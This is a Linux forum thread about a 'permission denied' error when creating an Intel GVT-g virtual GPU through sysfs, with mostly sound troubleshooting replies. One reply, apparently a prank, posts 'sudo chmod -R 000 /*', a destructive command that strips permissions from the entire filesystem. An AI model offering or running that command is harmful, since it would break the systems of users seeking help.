Intel GVT-g permissions issue

I'm trying to create a virtual GPU on top of my iGPU in my laptop to passthrough to a VM. I used this guide: 

And when I run 

sudo /bin/sh -c "echo [My-vGPU-UUID] > /sys/devices/pci0000:00/0000:[My-PCI-Device]/mdev_supported_types/[My-i915-GVTg-Type]/create"
(With proper values substituted), It returns: /bin/sh:line 1:/sys/devices/pci0000:00/0000:[My-PCI-Device]/mdev_supported_types/[My-i915-GVTg-Type]/create" permission denied. I already tried running as root. Any suggestions?

Desktop:

Intel Core i5 7600K @ 3.7GHz, 8GB x 2 GSkill Ripjaws, Gigabyte Gaming B8 Motherboard, 256GB Samsung 960 Pro PCIe NVMe SSD, 1.27 TB of Spanned Goodness, GTX 1050 Ti, and GT 710. Runs both macOS High Sierra and Windows 10, and Pop! OS 20.04 LTS.

Laptop:

Lenovo X1 Carbon 2nd Gen

Server:

7TB Array in Proxmox server

Intel Pentium G4560 @ 3.5GHz

16GB DDR4 

ASUS H270M Motherboard

1GB Zotac NVIDIA GT 710

[My-i915-GVTg-Type] and [My-vGPU-UUID] aren't intended to be copied and pasted as they are, they're place holders for your specific UUID and GVTg type. How you find those is detailed in the post you linked under the "Setting Up the vGPU" section.

Don't just copy and paste cli commands on Linux without understanding what they do, it can be dangerous.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

I replaced both of those with the generated uuid and specific version of i915 GVT-g. Otherwise,  the command would have returned with "no such file or directory"

Desktop:

Intel Core i5 7600K @ 3.7GHz, 8GB x 2 GSkill Ripjaws, Gigabyte Gaming B8 Motherboard, 256GB Samsung 960 Pro PCIe NVMe SSD, 1.27 TB of Spanned Goodness, GTX 1050 Ti, and GT 710. Runs both macOS High Sierra and Windows 10, and Pop! OS 20.04 LTS.

Laptop:

Lenovo X1 Carbon 2nd Gen

Server:

16GB DDR4 

ASUS H270M Motherboard

1GB Zotac NVIDIA GT 710

51 minutes ago, elin13 said:

I'm trying to create a virtual GPU on top of my iGPU in my laptop to passthrough to a VM. I used this guide: 

And when I run 

sudo /bin/sh -c "echo [My-vGPU-UUID] > /sys/devices/pci0000:00/0000:[My-PCI-Device]/mdev_supported_types/[My-i915-GVTg-Type]/create"
(With proper values substituted), It returns: /bin/sh:line 1:/sys/devices/pci0000:00/0000:[My-PCI-Device]/mdev_supported_types/[My-i915-GVTg-Type]/create" permission denied. I already tried running as root. Any suggestions?

Don't use sudo when running redirects, use "su" in the shell before issuing those commands

3 hours ago, Chunchunmaru_ said:

Don't use sudo when running redirects, use "su" in the shell before issuing those commands

Tried that. Still returned with permission denied

Desktop:

Laptop:

Lenovo X1 Carbon 2nd Gen

Server:

16GB DDR4 

ASUS H270M Motherboard

1GB Zotac NVIDIA GT 710

15 minutes ago, elin13 said:

Tried that. Still returned with permission denied

Don't use sh is unnecessary, type

Just again, use su before

echo [My-vGPU-UUID] > /sys/devices/pci0000:00/0000:[My- PCI-Device]/mdev_supported_types/[My-i 915-GVTg-Type]/create

I personally use 

echo [My-vGPU-UUID] | sudo tee /sys/devices/pci0000:00/0000:[My- PCI-Device]/mdev_supported_types/[My-i 915-GVTg-Type]/create

Also note that it will respond with Permission Denied if there are no avaliable slots for the device. This can happen if your Desktop Manager takes too much VRAM at startup.